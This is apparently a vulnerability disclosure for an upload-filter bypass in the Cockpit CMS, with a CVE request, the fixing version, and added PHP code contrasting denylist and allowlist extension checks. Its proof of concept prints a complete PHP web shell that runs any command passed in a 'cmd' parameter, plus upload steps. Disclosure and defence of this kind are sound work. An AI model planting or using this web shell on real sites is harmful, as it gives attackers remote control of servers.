
@CHOOCS
Created December 16, 2024 15:57
Insufficient Upload Filtering leads to RCE in cockpit-hq/cockpit
Based on the commit on GitHub, https://github.com/Cockpit-HQ/Cockpit/commit/becca806c7071ecc732521bb5ad0bb9c64299592
The upload filter for Cockpit assets is insufficient: an attacker can use a different extension to bypass the upload filter and achieve Remote Code Execution (RCE). It is advisable to use a whitelist (allowlist) method to filter the extension.
Proof of Concept:
Step 1: Create a file called evil.phar or evil.phtml (both of these extensions are able to bypass the filtering)
```php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
```
Paste the above code into the file as its content.
Step 2: Log in as a user
Step 3: Go to Assets
Step 4: Upload Assets
Step 5: Upload both files to the web application
Step 6: Copy the asset link and paste it into a new tab.
Step 7: Any command can now be executed.
===========================================================
Previously, I submitted this at Huntr Dev; the maintainer fixed the issue but hasn't responded to me, so Huntr Dev can't assign a CVE for me. I wonder if Snyk can help me publish this and assign me a CVE?
Here is the reference:
https://huntr.com/bounties/53a18fa1-19af-425c-8458-9b03911178f2
Here is the fixed commit code:
https://github.com/Cockpit-HQ/Cockpit/commit/984ef9ad270357b843af63c81db95178eae42cae
Fix:
Update the Cockpit version to v2.10.2
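As an added illustration of the whitelist advice above (example code written for this page, not Cockpit's own upload handler; the function names and the sample filenames are mine), the following contrasts a denylist check, which the .phar / .phtml files from the PoC slip past, with an allowlist check that only accepts known-safe extensions and always looks at the last extension:

```php
<?php
// Added example, not from the Cockpit codebase: denylist vs allowlist
// extension filtering for an asset upload endpoint.

// Denylist: blocks ".php" only. ".phar" and ".phtml" pass, and many
// web server configs still hand those to the PHP interpreter.
function denylistAllows(string $filename): bool {
    $blocked = ['php'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $blocked, true);
}

// Allowlist: only explicitly permitted extensions pass. pathinfo() returns
// the LAST extension, so "photo.jpg.phtml" is judged by "phtml" and rejected.
// A file with no extension yields "" and is rejected as well.
function allowlistAllows(string $filename): bool {
    $allowed = ['png', 'jpg', 'jpeg', 'gif', 'webp', 'pdf'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true);
}

// Constructed sample filenames: the two PoC names, a legitimate image,
// a double-extension variant and an upper-case variant.
$samples = ['evil.phar', 'evil.phtml', 'photo.jpg', 'photo.jpg.phtml', 'README.PHP', 'noext'];

foreach ($samples as $name) {
    printf("%-16s denylist: %-5s  allowlist: %s\n",
        $name,
        denylistAllows($name) ? 'pass' : 'block',
        allowlistAllows($name) ? 'pass' : 'block');
}
// Expected: denylist passes evil.phar, evil.phtml and photo.jpg.phtml;
// allowlist passes only photo.jpg.
```

Even with an allowlist, store uploaded assets in a directory where script execution is disabled (for example with no PHP handler mapped), so a filter miss cannot become code execution.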